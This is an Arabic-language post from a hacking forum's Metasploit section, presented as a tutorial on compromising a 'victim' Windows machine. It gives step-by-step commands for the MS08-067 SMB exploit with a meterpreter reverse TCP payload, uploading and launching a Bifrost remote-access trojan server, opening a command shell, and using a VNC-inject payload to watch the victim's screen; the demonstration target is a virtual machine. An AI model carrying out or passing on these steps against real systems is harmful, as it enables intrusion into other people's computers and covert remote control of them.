يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-03-2009, 12:16 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية punisher77
 

 

 
إحصائية العضو





punisher77 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
punisher77 is on a distinguished road

.................... الإختراق القاتل metasploit+bifrost معا


وأنا أفكر طرأت لي فكرة لا أعرف إن كانت طرحت بعد المهم هي إختراق الضحية بالميتا ورفع سيرفر بيفروست وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
وسأجربها علي جهاز إفتراضي كفانا من الكلام ولنبدأ.

من يرد التجربة علي جهازه فليقم بتحميل vbox أو ليقرأ موضوعي السابق علي هذا الرابط
والشرح سيكون بالصور
الشرح بالفيديو





إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits





ونختار windows/smb/ms08_067_netapi

show payloads



ونختار windows/meterpreter/reverse_tcp

أو نختارها مباشرة كما ف الصورة



والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter



كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445

************************************************** **********************

لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3



************************************************** ***********************
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح



لتشغيل السيرفر start server.exe

************************************************** ************************

وكما توضح الصورة نجاح تحميل السيرفر



والصور تعبر عن نفسها



شاشة الضحية



************************************************** ************************

لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
payload windows/meterpreter/reverse_tcp
set payload windows/vncinject/reverse_tcp

بتطبيق الثغرة ستفتح لنا الشاشة التالية




hgYojvhr hgrhjg metasploit+bifrost luh

التوقيع

http://www.vbspiders.com/vb/members/...1-user7796.jpg

 


التعديل الأخير تم بواسطة punisher77 ; 07-04-2009 الساعة 03:34 AM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
شباب طلب شل العقرب القاتل. double-zero جـــ'ابات العناكــ'ب 6 12-02-2010 02:48 PM
bifrost+metasploit حصريا في شبكة آعناكب NOT found قســم إختــراق الأجهــزة 2 08-08-2010 12:21 AM
شل العقرب القاتل الاصدار الرابع MATRIX ALGERIA قـسـم أدوات واندكـسات الإختراق 6 03-29-2010 06:31 PM


الساعة الآن 08:04 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0